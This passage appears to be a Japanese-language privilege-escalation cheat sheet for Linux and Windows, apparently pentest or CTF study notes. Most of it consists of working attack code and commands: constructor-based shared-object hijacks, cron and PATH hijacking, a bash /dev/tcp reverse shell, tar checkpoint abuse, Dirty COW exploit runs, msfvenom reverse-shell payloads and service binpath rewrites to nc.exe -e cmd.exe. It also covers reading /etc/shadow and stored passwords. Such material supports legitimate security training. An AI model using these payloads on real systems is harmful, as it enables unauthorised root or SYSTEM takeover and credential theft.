libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fd2f416b000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd2f5a7f000)
```
下記のコードを使用して、リストされているライブラリの1つ(ここではlibcrypt.so.1を選択)と同じ名前の共有オブジェクトを作成する。
```
library_path.c:
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
```
```
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /tmp/library_path.c
```
最後に、LD_LIBRARY_PATH環境変数を/tmp(コンパイルされた共有オブジェクトを出力する場所)に設定しながら、sudoを使用してapache2を実行する。
```
sudo LD_LIBRARY_PATH=/tmp apache2
```
これにより、GTFOBinsに記載がないプログラムでもsudo -lによってリストされていた場合にrootシェルを取得することができる。
## Cron Jobs - File Permissions
cronジョブはユーザーが特定の時間または間隔で実行するようにスケジュールできるプログラムである。
cronテーブルファイル(crontabs)は、cronジョブの構成が記載されており、システム全体のcrontabは/etc/crontabにある。
```
cat /etc/crontab
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
```
上記のコマンドにより、スケジュールされたrootで実行されているcronジョブが存在し、現在のユーザー権限で書き込み可能なファイルがある場合、reverse shellペイロードを書き込むことでrootシェルを取得できる。
## Cron Jobs - PATH Environment Variable
crontabのPATH変数が、下記のoverwrite.shのように明示されていない場合、PATH変数に示されているパスに同じ名前のreverse shellファイルなどを配置することで、rootシェルを取得できる。
```
user@debian:~/tools/sudo$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
```
例えば、上記の結果の場合は/home/userディレクトリにreverse shellペイロードを記述したoverwrite.shを配置することでrootシェルを取得できる。
## Cron Jobs - Wildcards
/etc/crontabを確認した結果、下記のスクリプトがスケジュールさていてた場合
```
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
```
tarコマンドが/home/userディレクトリのファイルをバックアップするために、ワイルドカード(*)を使用して実行されていることに着目する。
tarについてGTFOBinsを確認すると、tarにはチェックポイント機能の一部として他のコマンドを実行できるコマンドラインオプションがあることを分かる。
```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf
```
上記のバイナリをターゲット端末に転送して、ファイル権限を実行可能にしておく。
```
chmod +x /home/user/shell.elf
```
そして、ワイルドカード(*)で指定されているディレクトリに「--checkpoint=1」「--checkpoint-action=exec=shell.elf」を作成する。
cronジョブのtarコマンドが実行されると、ワイルドカード(*)によりこれらのファイルが含まれる。これらのファイル名は有効なtarコマンドラインのオプションであるため、tarはファイル名をコマンドオプションとして認識して、ファイル名ではなくコマンドラインオプションとして扱ってしまう。
これにより、shell.elfが実行されてrootシェルを取得することができる。
## Cron Jobs - Systemd Timers
/etc/systemd/system/配下にファイルを配置されているファイルをチェック(見たことがないファイルが置かれていないか)
- .service(定期実行するファイルのパスなどを記述)
- .timer(時間間隔の指定)
```
systemctl list-timers --all
```
```
find / -name *timer -type f 2>>/dev/null
```
```
# Systemd Timerの有効化
sudo systemctl start datetest.service
# Systemd Timerの起動
sudo systemctl start datetest.timer
```
## SUID/SGID Executables - Known Exploits
SUIDはSet User IDを表し、ユーザーはファイル所有者としてファイルを実行できる。
これを利用して、LinuxではSUIDビットが有効になってファイル所有者がrootになっている場合、既存のバイナリとコマンドの一部をroot以外のユーザーが使用して、rootアクセス権限を昇格させることができる。
下記のコマンドを実行するとSUIDアクセス許可を物全てのバイナリを列挙することができる。
```
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```
- /は、ファイルシステムの先頭(ルート)から開始し、すべてのディレクトリを検索
- -permは、後続の権限の検索
- -u=sは、rootユーザーが所有するファイルを検索
- -typeは、探しているファイルの種類を示します
- fは、ディレクトリや特殊ファイルではなく、通常のファイルを示す
- 2はプロセスの2番目のファイル記述子であるstderr(標準エラー)を示す
- >はリダイレクトを意味する
- /dev/nullは、書き込まれたすべてのものを破棄する特別なファイルシステムオブジェクト
```
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
-rwsr-sr-x 1 root root 926536 Feb 8 02:25 /tmp/rootbash
-rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
```
コマンドを実行した上記の結果より、exim-4.84-3を列挙できる。
このソフトウェアには既知のエクスプロイトが存在する(CVE-2016-1531)。
これらを利用してエクスプロイトすることで権限昇格できる可能性がある。
## SUID/SGID Executables - Shared Object Injection
SUID実行可能ファイル(今回はsuid-soという名前の実行可能ファイル)が共有オブジェクトインジェクションに対して脆弱な場合、権限昇格できる可能性がある。
ファイルに対して、straceを実行して"open|access|no such file"を検索する。
```
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
```
実行可能ファイルはホームディレクトリ内の/home/user/.config/libcalc.so共有オブジェクトを読み込もうとしているが、見つかっていないことを確認する。
これを利用するために、libcalc.soファイルの.configディレクトリを作成する。
```
mkdir /home/user/.config
```
下記のコードを利用して、suid-so実行可能ファイルが探してた場所にある共有オブジェクトにコードをコンパイルする。
コード内容としては単にbashシェルを生成するものである。
```
libcalc.c:
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
```
```
gcc -shared -fPIC -o /home/user/.config/libcalc.so /tmp/libcalc.c
```
suid-so実行可能ファイルを再度実行すると、rootシェルを取得できる。
```
/usr/local/bin/suid-so
```
## SUID/SGID Executables - Environment Variables
sudo・root権限で実行可能なスクリプト内(SUIDバイナリ)にserviceやcurl、gzip、psコマンドなどがフルパスなしで記述され実行されている場合、自分が用意したコマンド(/bin/shやreverse shellスクリプト)などを実行させるようにパスを書き換える。
今回、利用するバイナリは/usr/local/bin/suid-envとする。
```
strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
system
__libc_start_main
GLIBC_2.2.5
l$ L
t$(L
|$0H
service apache2 start
```
今回の場合、apache2を起動するためのserviceコマンドが絶対パスでないため、読み込むバイナリを置き換えてやることができる。
```
# Get a shell
echo $PATH
cd /tmp
echo /bin/sh > service
chmod 777 service
export PATH=/tmp:$PATH or PATH=/tmp:$PATH /usr/local/bin/suid-env
```
別のパターンとして、SUIDバイナリにgzipが使用されていた場合にreverse shellを取得する際について記載する。
```
# reverse shell
echo $PATH
cd /tmp
# gzipの部分はインジェクションさせたいコマンド
echo "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" > gzip
chmod 777 gzip
export PATH=/tmp:$PATH
# root権限で動かせるスクリプトなどを実行(前提としてスクリプト内で上記のgzipなどが記述されている)
./backup.sh
whoami → root
```
## SUID/SGID Executables - Abusing Shell Features (#1)
sudo・root権限で実行可能なスクリプト内(SUIDバイナリ)に絶対パスを使用してコマンドを実行していても、Bashのバージョン(<4.2-048)によって権限昇格できる可能性がある。
今回、利用するバイナリは/usr/local/bin/suid-env2とする。
```
strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
system
__libc_start_main
GLIBC_2.2.5
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start
```
/bin/bashのバージョンを確認する。
```
/bin/bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
```
次に新しいBashシェルを実行する「/usr/sbin/service」という名前のBash関数を作成して関数をエクスポートする。
```
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
```
最後にsuid-env2を実行して、rootシェルを取得する。
## SUID/SGID Executables - Abusing Shell Features (#2)
*Bashのバージョンが4.4以降では機能しない。
Bashデバッグを有効にし、PS4変数を/bin/bashのSUIDバージョンを作成する埋め込みコマンドに設定して/usr/local/bin/suid-env2実行可能ファイルを実行する。
```
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
```
-pを指定して、/tmp/rootbash実行可能ファイルを実行して、rootシェルを取得する。
## SUID/SGID Executables - Capability
SUIDはSet User IDを表し、ユーザーはファイル所有者としてファイルを実行できる。
これはファイルの所有者の権限でプログラム/ファイルを実行するための一時的なアクセス権をユーザーに与えるものとして定義されている。
Capabilityは通常ルートに割り当てられているアクションを細かく分割して実行する仕組み。
これを利用することで、通常80番ポートなどの1024以下のポートでWebサーバーなどをリッスンさせるためにはルート権限が必要だが、Webサーバーデーモンにroot権限を与えるのではなく、CAP_NET_BIND_SERVICEなどのCapabilitiesを設定することで簡単に80番ポートを開放することができる。
python,perl,tarが表示されれば、Capablityを利用して権限昇格できる可能性あり。
```
getcap -r / 2>/dev/null
```
```
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl5.30.0 = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```
### cap_setuid+ep
```
python3:
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl:
./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
```
### cap_dac_read_search+ep
- tarを使用して/etc/shadowを圧縮
- shadow.tarが生成される
- shadow.tarを展開するとetc/shadowディレクトリが作成される
- catなどで読み取り、パスワードハッシュをjohnやhashcatで解析する
```
./tar cvf shadow.tar /etc/shadow
./tar -xvf shadow.tar
cat etc/shadow
```
### Lxd Privilege Escalation
idコマンドでlxdグループに所属しているユーザの場合、権限昇格できる可能性がある。
```
# Attacker
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine
```
```
# Target
lxc image import ./alpine*.tar.gz --alias myimage
lxd init #全てEnterでok
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
cd /mnt/root/root
```
## Passwords & Keys - History Files
ユーザーが誤ってパスワードプロンプトではなく、コマンドラインでパスワード入力した場合、パスワードは履歴ファイルに記録される可能性がある。
下記のコマンドを使用して、ユーザーのホームディレクトリにある全ての日表示の履歴ファイルの内容を表示する。
```
cat ~/.*history | less
```
上記の結果より、パスワードらしきものが見つかればそれを利用してrootユーザーに切り替える。
## Passwords & Keys - Config Files
構成ファイルなどに、プレーンテキストや可逆形式のパスワードが含まれていることがある。
例えばWebアプリケーションのソースコードにハードコーディングされている場合や、MySQL内に保存されている場合、メモなどが残されている場合がある。
それらを利用して権限昇格できる可能性がある。
```
.htpasswd
```
## Passwords & Keys - SSH Keys
.sshディレクトリなどに正しい権限が付与されていない場合、rootユーザーの秘密鍵などを読み取れる可能性がある。
この秘密鍵を利用して、rootユーザーとしてログインする。
```
chmod 600 id_rsa
ssh -i id_rsa [email protected]
```
## NFSを悪用した権限昇格
NFSを介して作成されたファイルは、リモートユーザーのIDを継承する。
ユーザーがrootであり、rootスカッシングが有効になっている場合、IDは代わりに「nobody」ユーザーに設定される。
```
# NFSの設定ファイルを確認
cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
```
/tmpの共有ではno_root_squashとなっていることを確認する。
次にkaliのrootユーザーで/tmp共有をマウントする。
```
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
```
マウントされた共有に以下のペイロードを保存する。
```
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
```
最後に、ターゲットマシンでファイルを実行してrootシェルを取得する。
```
/tmp/shell.elf
```
## Kernel Exploit
カーネルバージョンを確認して、カーネルエクスプロイトを用いて権限昇格
```
uname -a
```
linux-exploit-suggester2による自動列挙:
https://github.com/jondonas/linux-exploit-suggester-2
### Dirtycow
#### 40839.c(dirty.c)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method):
https://www.exploit-db.com/exploits/40839
パスワードを自身で入力して、firefaltというアカウントを作成する。
```
gcc -pthread dirty.c -o dirty -lcrypt
chmod 755 dirty
```
```
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: pass
Complete line:
firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash
...
su firefart
```
#### 40616.c(cowroot.c)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method):
https://www.exploit-db.com/exploits/40616
実行するだけでrootになれる。
またx86用にも特に作業必要なくコンパイル可能。
```
gcc 40616.c -o cowroot -pthread
```
```
./cowroot
root@box:/root/cow# id
uid=0(root) gid=1000(foo) groups=1000(foo)
```
#### c0w
https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54
```
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
```
```
/usr/bin/passwd
```
### Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
https://www.exploit-db.com/exploits/45010
## Tips
### ファイルの検索
```
find / -name <ファイル名> -type f 2>>/dev/null
```
- /...ファイルシステム全体を検索
- -name...名前の指定
- -type f...ディレクトリではなく、ファイル検索を指定
- 2>>/dev/null...全てのエラーを破棄
### 実行中のプロセスを確認
```
ps aux
```
pspyによる実行中プロセスの確認:
https://github.com/DominicBreuker/pspy
ps auxコマンドでは確認できない定期的にUID=0(root権限)で実行されているスクリプトを確認することができる。
馴染みのないプロセスが動作している場合、そのプロセスが権限昇格の鍵になる場合もあるため、要チェック。
### 開いているポートの確認
```
netstat -tulpn
netstat -an(linux以外)
```
### チェックディレクトリ
```
/opt
```
### *.sh実行時に「bad interpreter: No such file or directory」が表示されたら
改行コードをCRLFからLFに置換して実行できるかを確認する。
```
sed -i 's/\r//' *.sh
```
### ユーザを指定してコマンドを実行
```
www-data@bashed:/$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ whoami
scriptmanager
```
### setuid.c
```
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
```
## PrivEsc Tools(Linux)
linpease.sh:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
LinEnum.sh
https://github.com/rebootuser/LinEnum
php-reverse-shell:
https://github.com/pentestmonkey/php-reverse-shell
PEASS-ng(linpeas.sh):
https://github.com/carlospolop/PEASS-ng
pspy:
https://github.com/DominicBreuker/pspy
SUID3NUM:
https://github.com/Anon-Exploiter/SUID3NUM
linux-exploit-suggester2:
https://github.com/jondonas/linux-exploit-suggester-2
# Privilege Escalation(Windows)
## チェック項目
- Service Exploits
- Insecure Service Permissions(安全でないサービスパーミッション)
- Unquoted Service Path(引用符で囲まれていないサービスパス)
- Weak Registry Permissions(レジストリ権限の不備)
- Insecure Service Executables(安全でないサービス実行可能ファイル)
- Registry(レジストリ)
- AutoRuns(AutoRunバイナリファイルの悪用)
- AlwaysInstallElevated(AlwaysInstallElevatedキーの悪用)
- Passwords
- Registry(レジストリ内に保存されているパスワードの検索)
- Saved Creds(保存されている資格情報の悪用)
- Security Account Manager(SAM)の悪用
- Pass the Hash
- Scheduled Tasksの悪用
- 安全でないGUIアプリの悪用
- スタートアップディレクトリの悪用
- トークンの偽装(Potato Attack, PrintSpoofer)
- Kernel Exploit
## PATH編集の修正
whoamiなどのコマンドが使用できない場合に変数を編集して実行できるようにする。
```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```
## Windowsサービスを悪用した権限昇格
```
# 現在のユーザーに割り当てられている特権を確認
whoami /priv
# サービスの構成を照会
sc qc <Service Name>
# サービスの現在のステータスを確認
sc query <Service Name>
# サービスの開始および停止
net start / net stop <Service Name>
# サービスの操作権限の表示(showrightsはSDDL権限と権限値を表示)
sc sdshow <Service Name> showrights
(例)
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;RPWPDT;;;S-1-5-21-3029548963-3893655183-1231094572-1001)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)
SDDL right Right value
---------- -----------
GA - GENERIC_ALL
GR - GENERIC_READ
GW - GENERIC_WRITE
GX - GENERIC_EXECUTE
RC - READ_CONTROL
SD - DELETE
WD - WRITE_DAC
WO - WRITE_OWNER
RP - SERVICE_START
WP - SERVICE_STOP
CC - SERVICE_QUERY_CONFIG
DC - SERVICE_CHANGE_CONFIG
LC - SERVICE_QUERY_STATUS
SW - SERVICE_ENUMERATE_DEPENDENTS
LO - SERVICE_INTERROGATE
DT - SERVICE_PAUSE_CONTINUE
CR - SERVICE_USER_DEFINED_CONTROL
↑↑D:はDACL(随時アクセス制御リスト)を指し、S:はSACL(システムアクセス制御リスト)を指す。
(A;;RPWPDT;;;S-1-5-21-3029548963-3893655183-1231094572-1001)は、左から(A/D(許可/拒否);;権限;;SID)となる。
# 現在のドメイン名\ユーザ名とSID(Windowsユーザアカウントやユーザグループに与えられる固有の識別番号)を確認
whoami /user
(例)
USER INFORMATION
----------------
User Name SID
================== ==============================================
steelmountain\bill S-1-5-21-3029548963-3893655183-1231094572-1001
今回の場合、SID(A;;RPWPDT;;;S-1-5-21-3029548963-3893655183-1231094572-1001)となっているため、照会したサービスは現在ログインしているユーザーでサービスをstart(RP)/stop(WP)して再起動できることが分かる。
これらの調査をPowerUp.ps1を利用すると簡便に確認することが可能である。
```
### Powershellを利用したWindowsサービスの列挙
```
powershell -c "Get-Service"
```
### WMCIを利用したWindowsサービスの列挙
```
wmic service list brief
```
上記のコマンドでは非常に多くの出力が生成される。
下記のコマンドでは動作しているサービス名を見やすい形で出力できる。
```
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a
```
さらに、上記のコマンドをpermissions.txtとして出力することで、icaclsコマンドを利用したアクセス権の確認を行うことができる。
```
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a" >> path.txt
```
### sc.exeを利用したWindowsサービスの列挙
```
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
```
これでicaclsコマンドを使用して1つずつアクセス権限を確認する。
```
icacls "C:\path\to\file.exe"
```
system32のバイナリは、Windowsによってインストールされるためほとんど正しいとして除外する。
### 安全でないサービスのプロパティ
Windowsの各サービスには、特定のサービス固有の各セス許可を定義するACL(アクセス制御リスト)がある。
侵入中のユーザ権限で下記のACL権限を持っている場合、権限をエスカレードできる可能性がある。
- SERVICE_STOP, SERVICE_START
- SERVICE_CHANGE, SERVICE_ALL_ACCESS
```
accesschk.exe /accepteula
accesschk.exe -ucqv <Service Name>
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv <Service Name>
```
- /accepteula...EULA(ソフトウェア使用許諾契約)を省略
## Service Exploits - Insecure Service Permissions(安全でないサービスパーミッション)
「daclsvc」サービスに対する「user」アカウントの権限を確認する。
```
accesschk.exe /accepteula -uwcqv user *
or
accesschk.exe /accepteula -uwcqv user daclsvc
```
上記のコマンドにより、「user」アカウントには「SERVICE_CHANGE_CONFIG」を変更する権限があることを確認する。
次に下記のコマンドで「daclsvc」サービスを照会してSYSTEM特権(SERVICE_START_NAME)で実行されることを確認する。
```
sc.exe qc daclsvc
```
サービス構成を変更し、「BINARY_PATH_NAME(binpath)」をreverse shellペイロードを配置したパスに書き換える。
```
sc config daclsvc binpath= "\"C:\Windows\Temp\reverse.exe\""
```
最後に、netcatでlistenしてからサービスを開始すると、SYSTEM権限のreverse shellを取得できる。
```
net start daclsvc
```
## Service Exploits - Unquoted Service Path(引用符で囲まれていないサービスパス)
サービスに使用される実行可能ファイルへのパスが引用符で囲まれていない場合に現れる脆弱性。
「unquotedsvc」サービスを照会して、システム特権(SERVICE_START_NAME)で実行されていることと、「BINARY_PATH_NAME」が引用符で囲まれておらずスペースが含まれていることを確認する。
```
C:\Windows\Temp > sc.exe qc <Service Name>
SERVICE_NAME: <Service Name>
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
```
accesschk.exeを使用して現在のユーザーグループがC:\Program Files\Unquoted Path Service\ディレクトリへの書き込みが許可されていることを確認する。
```
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
```
reverse shellペイロードの名前をCommon.exeに変更したものC:\Program Files\Unquoted Path Service\ディレクトリに配置をする。
最後に、netcatでlistenしてからサービスを開始すると、SYSTEM権限のreverse shellを取得できる。
```
net start <Service Name>
```
別のサービスの悪用:
ここで権限昇格に使用するサービス名は<AdvancedSystemcareservice9>とする。
この脆弱性を悪用する方法は、悪意のある実行可能ファイルをサービスパスのどこかに配置し、サービスパスの次のディレクトリの最初の数文字で始まる名前を付ける。
サービスが開始(再起動)されると、悪意のあるバイナリ(reverse shell)が実行され、シェルを取得できる。
```
# 手動による列挙
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
例)AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
# 通常のユーザーがサービスの実行可能ファイルが配置されているディレクトリ等に書き込みアクセスを持っているかどうかを確認
icacls "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
```
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=9001 -f exe > Advanced.exe
rlwrap nc -lvnp 9001
```
```
certutil -urlcache -split -f "http://10.10.10.1/Advanced.exe"
sc stop AdvancedSystemcareservice9
sc start AdvancedSystemcareservice9
```
## Service Exploits - Weak Registry Permissions
サービスを照会し、SYSTEM特権(SERVICE_START_NAME)で実行されていることを確認する。
```
sc qc <Service Name>
```
accesschk.exeを使用して、Windowsサービスのレジストリエントリが「NT AUTHORITY\INTERACTIVE」グループ(基本的にすべてのログオンユーザー)によって書き込み可能であることを確認する。
```
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<Service Name>
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
```
reverse shellペイロードが配置されているパスを指すようにImagePathレジストリキーを上書きする。
```
reg add HKLM\SYSTEM\CurrentControlSet\services\<Service Name> /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\reverse.exe /f
```
最後に、netcatでlistenしてからサービスを開始すると、SYSTEM権限のreverse shellを取得できる。
```
net start <Service Name>
```
## Service Exploits - Insecure Service Executables
サービスを照会し、SYSTEM特権(SERVICE_START_NAME)で実行されていることを確認する。
```
sc qc <Service Name>
```
accesschk.exeを使用してサービスバイナリ(BINARY_PATH_NAME)ファイルが誰でも書き込み可能であることを確認する。
```
accesschk.exe /accepteula -quvw "C:\Program Files\<Service Name>\<Service>.exe"
```
reverse shellペイロードをコピーしてBINARY_PATH_NAMEで示されたバイナリを置き換える。
```
copy C:\PrivEsc\reverse.exe "C:\Program Files\<Service Name>\<Service(reverse shellペイロードの名前をサービスバイナリの名前に変更したもの)>.exe" /Y
```
最後に、netcatでlistenしてからサービスを開始すると、SYSTEM権限のreverse shellを取得できる。
```
net start <Service Name>
```
## Service Permissions - Modifiable Services
PowerUp.ps1によってSYSTEM権限で実行されている書き換え可能なサービスが存在する場合に実行する。
```
ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'daclsvc'
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
Name : UsoSvc
Check : Modifiable Services
```
```
PS C:\windows\temp> sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Public\Documents\nc.exe 10.10.16.2 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
```
```
# 手動による悪用
sc.exe stop UsoSvc
sc.exe config UsoSvc binpath= "C:\Users\Public\Documents\nc.exe 10.10.16.2 4444 -e cmd.exe"
## 書き換えられていることを確認
sc.exe qc UsoSvc
sc.exe start UsoSvc
or
# PowerUpのInvoke-ServiceAbuseを利用した悪用
Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command 'C:\Windows\temp\nc.exe -e cmd.exe 10.10.16.2 9000'
```
## Registry - AutoRuns
レジストリにAutoRun実行可能ファイルを照会する。
```
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
accesschk.exeを使用して、AutoRun実行可能ファイルが誰でも書き込み可能であることを確認する。
```
C:\PrivEsc\accesschk.exe /accepteula -wvu "<上記のreg query確認したサービスのバイナリパス>"
```
最後に、netcatでlistenしてからターゲットのWindowsを再起動して、管理者(admin権限のユーザー)としてログインされるとSYSTEM権限で置き換えたペイロードが起動される。
```
shutdown /r /t 0
その後、管理者権限でログインされる必要がある
```
## Registry - AlwaysInstallElevated
レジストリにAlwaysInstallElevatedキーを照会する。
```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
ここで両方のキーが1(0x1)に設定されていることを確認する。
そして、msfvenomを使用してreverse shell Windowsインストーラー(reverse.msi)を生成する。
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
```
最後に、netcatでlistenしてからインストーラーを実行すると、SYSTEM権限のreverse shellを取得できる。
```
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```
## Passwords - files
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
```
```
findstr /si password *.txt
